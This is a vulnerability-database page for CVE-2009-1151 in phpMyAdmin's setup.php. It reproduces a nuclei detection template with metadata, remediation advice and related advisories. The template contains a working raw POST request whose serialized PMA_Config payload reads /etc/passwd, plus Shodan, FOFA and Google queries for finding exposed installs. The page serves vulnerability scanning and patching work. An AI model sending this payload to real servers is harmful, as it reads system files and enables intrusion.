Lucene search
PhpMyAdmin Scripts - Remote Code Execution
๐๏ธย 14 Apr 2021ย 12:59:04Reported byย ProjectDiscoveryTypeย 
ย nuclei๐ย github.com๐ย 74ย Views
PhpMyAdmin Scripts - Remote Code Execution vulnerability in setup.php allows remote attackers to inject arbitrary PHP code, potentially leading to unauthorized access and data leakage
Show more
| Reporter | Title | Published | Views | Family All 61 |
|---|---|---|---|---|
 | PHPMyAdmin Misconfiguration Remote Code Injection (CVE-2009-1151) | 23 Feb 201400:00 | โ | checkpoint_advisories |
 | PhpMyAdmin Config File Code Injection | 31 Dec 200900:00 | โ | packetstorm |
| phpMyAdmin /scripts/setup.php Code Injection | 10 Jun 200900:00 | โ | packetstorm |
 | FreeBSD Ports: phpMyAdmin211 | 31 Mar 200900:00 | โ | openvas |
| FreeBSD Ports: phpMyAdmin211 | 31 Mar 200900:00 | โ | openvas |
| phpMyAdmin Code Injection and XSS Vulnerability | 26 Mar 200900:00 | โ | openvas |
| Debian Security Advisory DSA 1824-1 (phpmyadmin) | 30 Jun 200900:00 | โ | openvas |
| Mandrake Security Advisory MDVSA-2009:115 (phpMyAdmin) | 25 May 200900:00 | โ | openvas |
| Gentoo Security Advisory GLSA 200906-03 (phpmyadmin) | 6 Jul 200900:00 | โ | openvas |
| Mandrake Security Advisory MDVSA-2009:115 (phpMyAdmin) | 25 May 200900:00 | โ | openvas |
10
id: CVE-2009-1151
info:
name: PhpMyAdmin Scripts - Remote Code Execution
author: princechaddha
severity: high
description: PhpMyAdmin Scripts 2.11.x before 2.11.9.5 and 3.x before 3.1.3.1 are susceptible to a remote code execution in setup.php that allows remote attackers to inject arbitrary PHP code into a configuration file via the save action. Combined with the ability to save files on server, this can allow unauthenticated users to execute arbitrary PHP code.
impact: |
Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the affected system.
remediation: |
Update PhpMyAdmin to the latest version or apply the necessary patches.
reference:
- https://www.phpmyadmin.net/security/PMASA-2009-3/
- https://github.com/vulhub/vulhub/tree/master/phpmyadmin/WooYun-2016-199433
- http://phpmyadmin.svn.sourceforge.net/viewvc/phpmyadmin/branches/MAINT_2_11_9/phpMyAdmin/scripts/setup.php?r1=11514&r2=12301&pathrev=12301
- http://www.phpmyadmin.net/home_page/security/PMASA-2009-3.php
- https://nvd.nist.gov/vuln/detail/CVE-2009-1151
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
cvss-score: 7.5
cve-id: CVE-2009-1151
cwe-id: CWE-94
epss-score: 0.79939
epss-percentile: 0.983
cpe: cpe:2.3:a:phpmyadmin:phpmyadmin:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: phpmyadmin
product: phpmyadmin
shodan-query:
- http.title:"phpmyadmin"
- http.component:"phpmyadmin"
- cpe:"cpe:2.3:a:phpmyadmin:phpmyadmin"
fofa-query:
- title="phpmyadmin"
- body="pma_servername" && body="4.8.4"
google-query: intitle:"phpmyadmin"
hunter-query: app.name="phpmyadmin"&&web.body="pma_servername"&&web.body="4.8.4"
tags: cve,cve2009,deserialization,kev,vulhub,phpmyadmin,rce
http:
- raw:
- |
POST /scripts/setup.php HTTP/1.1
Host: {{Hostname}}
Accept-Encoding: gzip, deflate
Accept: */*
Content-Type: application/x-www-form-urlencoded
action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# digest: 4b0a00483046022100f2b76f124d11b857d8e2afe445395be2c29f10122deaa5a7401cd2724a3398ec022100e9d3ee1f48118e34d7ab8b8e5697426675a055174a60f5a8a3446cf4ebd44b39:922c64590222798bb761d5b6d8e72950Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contactย us for a demo andย discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo14 Apr 2021 12:04Current
9.8High risk
Vulners AI Score9.8
CVSS27.5
CVSS39.8
EPSS0.85566